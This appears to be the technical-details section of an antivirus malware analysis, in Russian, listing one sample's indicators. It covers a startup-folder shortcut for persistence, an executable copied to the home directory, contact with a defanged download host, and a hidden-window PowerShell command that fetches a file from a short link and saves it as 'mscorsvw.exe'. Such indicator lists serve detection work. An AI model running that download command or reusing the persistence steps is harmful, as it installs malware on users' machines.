Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\sfhdghfgh.lnk
- https://goo.gl/yx4i2a как (get-childitem env:\userprofile
- %HOMEPATH%\sfhdghfgh.exe
- %HOMEPATH%\sfhdghfgh.exe
- 'dl#.#oxi.net':80
- http://dl#.#oxi.net/drive/2018/10/14/0027/3642/1777210/10/00b0632ec2.txt
- DNS ASK dl#.#oxi.net
- '%HOMEPATH%\sfhdghfgh.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Copy-Item -Path '<Полный путь к файлу>' -destination '%HOMEPATH%\sfhdghfgh.exe' (со скрытым окном)
- '%HOMEPATH%\sfhdghfgh.exe' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -c (New-Object Net.WebClient).DownloadFile('https://goo.gl/YX4i2a', (Get-ChildItem env:\userprofile).value + '\mscorsvw.exe') (со скрытым окном)